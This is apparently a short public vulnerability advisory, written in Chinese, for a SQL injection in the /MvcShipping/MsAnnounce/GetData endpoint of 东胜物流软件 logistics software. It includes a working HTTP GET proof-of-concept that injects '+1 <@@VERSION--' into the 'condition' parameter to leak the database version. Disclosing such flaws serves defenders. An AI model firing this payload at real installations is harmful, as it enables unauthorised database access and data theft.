东胜物流软件 /MvcShipping/MsAnnounce/GetData SQL 注入漏洞

2026-02-28 东胜物流软件 PoC Public

Description

东胜物流软件的 /MvcShipping/MsAnnounce/GetData 接口存在 SQL 注入漏洞。该接口在处理 condition 参数时未进行充分的输入校验和参数化绑定,攻击者可通过构造恶意的 SQL 查询(如注入条件 +1 <@@VERSION),从而泄露数据库的版本信息,并进一步进行数据库信息的提取。

PoC

GET /MvcShipping/MsAnnounce/GetData?handle=edit&condition=+1+%3C@@VERSION-- HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities